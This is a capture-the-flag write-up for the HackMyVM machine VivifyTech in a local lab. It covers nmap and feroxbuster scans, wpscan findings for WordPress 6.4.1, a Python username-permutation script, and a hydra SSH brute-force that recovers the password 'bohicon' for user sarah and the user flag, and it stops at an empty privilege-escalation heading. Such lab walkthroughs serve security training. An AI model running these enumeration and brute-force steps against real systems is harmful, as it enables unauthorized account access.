VivifyTech - hackmyvm

Introduction

Machine name: VivifyTech

Difficulty: easy

Machine page: https://hackmyvm.eu/machines/machine.php?vm=VivifyTech

Local environment

Hypervisor: VirtualBox

Target IP (VivifyTech): 192.168.56.119

Jump host IP (Windows 11): 192.168.56.1, 192.168.190.100

Attacker IP (Kali): 192.168.190.131

Scanning

Start with nmap: a full TCP sweep first, then service/script/OS detection on only the ports that came back open

nmap -sT -p0- 192.168.56.119 -oA nmapscan/ports ;ports=$(grep open ./nmapscan/ports.nmap | awk -F '/' '{print $1}' | paste -sd ',');echo $ports >> nmapscan/tcp_ports;
nmap -sT -sV -sC -O -p$ports 192.168.56.119 -oA nmapscan/detail

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-16 09:31 EDT
Nmap scan report for 192.168.56.119
Host is up (0.00034s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey:
|   256 32:f3:f6:36:95:12:c8:18:f3:ad:b8:0f:04:4d:73:2f (ECDSA)
|_  256 1d:ec:9c:6e:3c:cf:83:f6:f0:45:22:58:13:2f:d3:9e (ED25519)
80/tcp    open  http    Apache httpd 2.4.57 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.57 (Debian)
3306/tcp  open  mysql   MySQL (unauthorized)
33060/tcp open  mysqlx?
| fingerprint-strings:
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
|     Invalid message"
|     HY000
|   LDAPBindReq:
|     *Parse error unserializing protobuf message"
|     HY000
|   oracle-tns:
|     Invalid message-frame."
|_    HY000
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP
Running: Actiontec embedded, Linux
OS CPE: cpe:/h:actiontec:mi424wr-gen3i cpe:/o:linux:linux_kernel
OS details: Actiontec MI424WR-GEN3I WAP
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.68 seconds

The classic 22 and 80, plus MySQL exposed to the network. Port 33060 is the MySQL X Protocol port (mysqlx), which is enabled by default from MySQL 8.0 onward (the X Plugin exists as an optional plugin since 5.7.12), so the server is almost certainly 8.0 or newer. The "unauthorized" on 3306 means the server rejects our source host before authentication, so no version banner. Ignore the OS guess of an Actiontec WAP: nmap itself warns the fingerprint is unreliable, and the SSH banner (Debian 2+deb12u1) already tells us this is Debian 12.
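The grep/awk pipeline in the first command works for this box, but it keys on the word "open" anywhere in the .nmap file. The following added example (mine, not part of the original writeup) instead parses the greppable .gnmap file that -oA also writes, keeps only ports whose state is exactly "open" for the requested protocol, and builds the -p list for the follow-up scan. The sample .gnmap text is constructed to match the ports found above, with one filtered port added to show it is excluded.

```python
import re
from typing import Dict, List

# Constructed sample in nmap's greppable (-oG / .gnmap) format. Each port entry is
# port/state/protocol/owner/service/rpcinfo/version/ ; without -sV the version
# field is empty. The 25/filtered entry is there to show that only "open" counts.
SAMPLE_GNMAP = """\
# Nmap 7.94SVN scan initiated Sun Jun 16 09:31:00 2024 as: nmap -sT -p0- -oA nmapscan/ports 192.168.56.119
Host: 192.168.56.119 ()\tStatus: Up
Host: 192.168.56.119 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 3306/open/tcp//mysql///, 33060/open/tcp//mysqlx///, 25/filtered/tcp//smtp///\tIgnored State: closed (65531)
# Nmap done at Sun Jun 16 09:31:19 2024 -- 1 IP address (1 host up) scanned in 18.68 seconds
"""

# port / state / protocol are the first three slash-separated fields of an entry
PORT_RE = re.compile(r"(\d+)/([^/]*)/([^/]*)/")


def open_ports(gnmap_text: str, proto: str = "tcp") -> Dict[str, List[int]]:
    """Map each host in a .gnmap file to its sorted list of ports in state 'open'."""
    result: Dict[str, List[int]] = {}
    for line in gnmap_text.splitlines():
        # Only "Host:" lines carry a "Ports:" field; comment and Status lines are skipped.
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        # The Ports field runs up to the next tab-separated field (e.g. "Ignored State:").
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for entry in ports_field.split(","):
            m = PORT_RE.match(entry.strip())
            if m and m.group(2) == "open" and m.group(3) == proto:
                result.setdefault(host, []).append(int(m.group(1)))
    return {h: sorted(set(p)) for h, p in result.items()}


def port_spec(ports: List[int]) -> str:
    """Format a port list for nmap -p, e.g. '22,80,3306,33060'."""
    return ",".join(str(p) for p in ports)


def detail_scan_cmd(host: str, ports: List[int]) -> str:
    """The second-stage scan from the writeup, built from the parsed port list."""
    return f"nmap -sT -sV -sC -O -p{port_spec(ports)} {host} -oA nmapscan/detail"


if __name__ == "__main__":
    for host, ports in open_ports(SAMPLE_GNMAP).items():
        print(detail_scan_cmd(host, ports))
```

Point the script at the real nmapscan/ports.gnmap instead of SAMPLE_GNMAP and it replaces the grep/awk/paste chain; states like "open|filtered" (seen in UDP scans) are deliberately not treated as open.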

HTTP service

What is this... there is not even a site, just the Apache default page.

A quick directory scan, and wow, everything comes out at once (the -C 500 drops the 500 responses, -d 3 recurses three levels deep)

feroxbuster -u http://192.168.56.119/ -t 20 -w $HVV_Tool/8_dict/seclist/Discovery/Web-Content/directory-list-2.3-medium.txt  -C 500  -d 3

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.56.119/
 🚀  Threads               │ 20
 📖  Wordlist              │ /home/kali/1_Tool/1_HVV/8_dict/seclist/Discovery/Web-Content/directory-list-2.3-medium.txt
 💢  Status Code Filters   │ [500]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 3
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       24l      127w    10359c http://192.168.56.119/icons/openlogo-75.png
301      GET        9l       28w      320c http://192.168.56.119/wordpress => http://192.168.56.119/wordpress/
200      GET      368l      933w    10701c http://192.168.56.119/
301      GET        9l       28w      332c http://192.168.56.119/wordpress/wp-includes => http://192.168.56.119/wordpress/wp-includes/
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/widgets.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/l10n.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/plugin.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/template.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/fonts.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-taxonomy.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-role.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-walker.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-tax-query.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-error.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-type.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-hook.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-list-util.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-site-query.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-oembed-controller.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/block-template-utils.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-theme-json-schema.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wpdb.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-http-streams.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-customize-widgets.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/link-template.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-recovery-mode.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/option.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/ms-default-constants.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/general-template.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/block-template.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/bookmark.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-paused-extensions-storage.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-duotone.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/cache-compat.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/functions.wp-styles.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/category.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/shortcodes.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/rss-functions.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-image-editor.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-user-request.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-classic-to-block-menu-converter.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-phpass.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/ms-site.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/nav-menu.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-supports.php
200      GET        1l        4w       29c http://192.168.56.119/wordpress/wp-includes/ms-files.php
301      GET        9l       28w      331c http://192.168.56.119/wordpress/wp-content => http://192.168.56.119/wordpress/wp-content/
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-theme.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/error-protection.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/ms-network.php
200      GET       48l       48w      439c http://192.168.56.119/wordpress/wp-includes/secrets.txt
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-term-query.php
301      GET        9l       28w      339c http://192.168.56.119/wordpress/wp-content/uploads => http://192.168.56.119/wordpress/wp-content/uploads/
301      GET        9l       28w      339c http://192.168.56.119/wordpress/wp-content/plugins => http://192.168.56.119/wordpress/wp-content/plugins/
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/post-thumbnail-template.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/pluggable-deprecated.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/author-template.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-recovery-mode-key-service.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/pluggable.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-parser-frame.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/kses.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-recovery-mode-link-service.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-locale-switcher.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-comment.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/theme-templates.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/ms-load.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-requests.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/ms-functions.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/comment.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/bookmark-template.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-theme-json-resolver.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-navigation-fallback.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-meta-query.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-customize-manager.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-patterns-registry.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/user.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/global-styles-and-settings.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-widget-factory.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-http-encoding.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/wp-db.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/load.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-customize-nav-menus.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-date-query.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-template.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/revision.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/post-template.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-editor-context.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-parser.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/embed.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/taxonomy.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-pattern-categories-registry.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-ajax-response.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-post.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/rewrite.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-application-passwords.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/formatting.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-parser-block.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-http-curl.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/atomlib.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/theme-previews.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/sitemaps.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-comment-query.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-http-cookie.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/feed.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-matchesmapregex.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/query.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-post-type.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-locale.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/deprecated.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-metadata-lazyloader.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-user-query.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/blocks.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/comment-template.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/capabilities.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-editor.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/default-constants.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/http.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/compat.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-dependency.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/rest-api.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-widget.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-feed-cache-transient.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-object-cache.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-rewrite.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/theme.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-theme-json-data.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-network.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-http-proxy.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/https-detection.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/post.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/category-template.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-recovery-mode-email-service.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/robots-template.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-roles.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-recovery-mode-cookie-service.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-dependencies.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-phpmailer.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-admin-bar.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/admin-bar.php
200      GET       86l      145w     1151c http://192.168.56.119/wordpress/wp-includes/theme-i18n.json
200      GET       17l       41w      316c http://192.168.56.119/wordpress/wp-includes/block-i18n.json
200      GET      326l      708w     7303c http://192.168.56.119/wordpress/wp-includes/theme.json
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-textdomain-registry.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-fatal-error-handler.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-query.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-list.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-user.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/functions.wp-scripts.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-network-query.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-embed.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/https-migration.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-pop3.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-session-tokens.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-type-registry.php
301      GET        9l       28w      338c http://192.168.56.119/wordpress/wp-content/themes => http://192.168.56.119/wordpress/wp-content/themes/
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/canonical.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-theme-json.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/version.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/style-engine.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-styles-registry.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-term.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-http-response.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/media-template.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/block-editor.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/post-formats.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/ms-deprecated.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-site.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/cron.php
200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-oembed.php
301      GET        9l       28w      329c http://192.168.56.119/wordpress/wp-admin => http://192.168.56.119/wordpress/wp-admin/
301      GET        9l       28w      334c http://192.168.56.119/wordpress/wp-admin/user => http://192.168.56.119/wordpress/wp-admin/user/
301      GET        9l       28w      337c http://192.168.56.119/wordpress/wp-admin/network => http://192.168.56.119/wordpress/wp-admin/network/
301      GET        9l       28w      333c http://192.168.56.119/wordpress/wp-admin/css => http://192.168.56.119/wordpress/wp-admin/css/
301      GET        9l       28w      338c http://192.168.56.119/wordpress/wp-admin/includes => http://192.168.56.119/wordpress/wp-admin/includes/

Once we know it is WordPress, run wpscan against it (the API token is what pulls the vulnerability data for the detected version)

wpscan --url http://192.168.56.119/wordpress --api-token=VjtWw...
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.56.119/wordpress/ [192.168.56.119]
[+] Started: Mon Jun 17 00:01:26 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.57 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.119/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.119/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.119/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.119/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.4.1 identified (Insecure, released on 2023-11-09).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.56.119/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=6.4.1</generator>
 |  - http://192.168.56.119/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.4.1</generator>
 |
 | [!] 4 vulnerabilities identified:
 |
 | [!] Title: WP 6.4-6.4.1 - POP Chain
 |     Fixed in: 6.4.2
 |     References:
 |      - https://wpscan.com/vulnerability/2afcb141-c93c-4244-bde4-bf5c9759e8a3
 |      - https://fenrisk.com/publications/blogpost/2023/11/22/gadgets-chain-in-wordpress/
 |
 | [!] Title: WordPress < 6.4.3 - Deserialization of Untrusted Data
 |     Fixed in: 6.4.3
 |     References:
 |      - https://wpscan.com/vulnerability/5e9804e5-bbd4-4836-a5f0-b4388cc39225
 |      - https://wordpress.org/news/2024/01/wordpress-6-4-3-maintenance-and-security-release/
 |
 | [!] Title: WordPress < 6.4.3 - Admin+ PHP File Upload
 |     Fixed in: 6.4.3
 |     References:
 |      - https://wpscan.com/vulnerability/a8e12fbe-c70b-4078-9015-cf57a05bdd4a
 |      - https://wordpress.org/news/2024/01/wordpress-6-4-3-maintenance-and-security-release/
 |
 | [!] Title: WP < 6.5.2 - Unauthenticated Stored XSS
 |     Fixed in: 6.4.4
 |     References:
 |      - https://wpscan.com/vulnerability/1a5c5df1-57ee-4190-a336-b0266962078f
 |      - https://wordpress.org/news/2024/04/wordpress-6-5-2-maintenance-and-security-release/

[+] WordPress theme in use: twentytwentyfour
 | Location: http://192.168.56.119/wordpress/wp-content/themes/twentytwentyfour/
 | Last Updated: 2024-04-02T00:00:00.000Z
 | Readme: http://192.168.56.119/wordpress/wp-content/themes/twentytwentyfour/readme.txt
 | [!] The version is out of date, the latest version is 1.1
 | [!] Directory listing is enabled
 | Style URL: http://192.168.56.119/wordpress/wp-content/themes/twentytwentyfour/style.css
 | Style Name: Twenty Twenty-Four
 | Style URI: https://wordpress.org/themes/twentytwentyfour/
 | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
 | Author: the WordPress team
 | Author URI: https://wordpress.org
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.56.119/wordpress/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.0'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <==============> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 2
 | Requests Remaining: 23

[+] Finished: Mon Jun 17 00:01:33 2024
[+] Requests Done: 174
[+] Cached Requests: 5
[+] Data Sent: 48.24 KB
[+] Data Received: 307.614 KB
[+] Memory used: 256.867 MB
[+] Elapsed time: 00:00:07

Information gathering and brute force

I then spent a long while looking for a PoC against the theme and the WordPress version, with no result. Going back over the directory scan, I noticed there is a secrets.txt sitting in wp-includes...

Honestly, dropping it into a directory like that is a bit of a troll.

Following the machine author's line of thought, the next step is collecting usernames. Besides the home page, there is the published post "The story behind VivifyTech"; combined, they give the following list

sancelisso
Sarah
Mark
Jake
Alex

Expand it with a username-permutation script

import argparse


def generate_additional_combinations(parts):
    """Extra patterns for two-part names (first and last name)."""
    combinations = set()
    if len(parts) == 2:
        first, last = parts
        combinations.add(first.lower() + last[0].lower() + last[1:])  # first lowercased + last with lowercase initial
        combinations.add(first.lower() + last[0].lower())             # first + last initial, lowercase
        combinations.add(first.upper() + last[0].upper())             # first + last initial, uppercase

        combinations.add(last.lower() + first[0].lower())             # last + first initial, lowercase
        combinations.add(last.upper() + first[0].upper())             # last + first initial, uppercase
    return combinations


def generate_usernames(usernames):
    generated_usernames = set()
    for name in usernames:
        parts = name.split()          # split on whitespace
        if '.' in name:
            parts = name.split('.')   # or on dots ("john.smith")

        # common username forms
        generated_usernames.add(name.lower())                                   # all lowercase
        generated_usernames.add(name.upper())                                   # all uppercase
        generated_usernames.add(''.join(part[0] for part in parts).lower())     # initials, lowercase
        generated_usernames.add('.'.join(parts).lower())                        # dot-joined, lowercase

        # the special two-part forms
        generated_usernames.update(generate_additional_combinations(parts))

    return sorted(generated_usernames)


def read_usernames(filename):
    with open(filename, 'r') as file:
        return [line.strip() for line in file if line.strip()]


def main():
    parser = argparse.ArgumentParser(description='Generate possible usernames.')
    parser.add_argument('-f', '--input-file', required=True, help='Input file containing a list of usernames.')
    parser.add_argument('-o', '--output-file', default='output.txt', help='Output file for possible usernames.')

    args = parser.parse_args()

    usernames = read_usernames(args.input_file)
    new_usernames = generate_usernames(usernames)
    with open(args.output_file, 'w') as file:
        for username in new_usernames:
            file.write(username + '\n')

    print(f"Username combinations have been written to {args.output_file}")


if __name__ == "__main__":
    main()

Resulting output.txt for the five names above (the single-letter entries are the "initials" form of one-word names):

ALEX
JAKE
MARK
SANCELISSO
SARAH
a
alex
j
jake
m
mark
s
sancelisso
sarah

First I tried brute-forcing the WordPress admin login with Burp, without result.

Then I tried hydra against SSH, with the generated user list as logins and secrets.txt as the password list, which found the credentials sarah/bohicon (-I skips the restore-file prompt, -t 8 keeps the parallelism low enough not to trip sshd's connection limit)

hydra -t 8 -L user.txt -P secrets.txt 192.168.56.119 ssh -I

That gets us user.txt in sarah's home directory

HMV{Y0u_G07_Th15_0ne_6543}

Privilege escalation

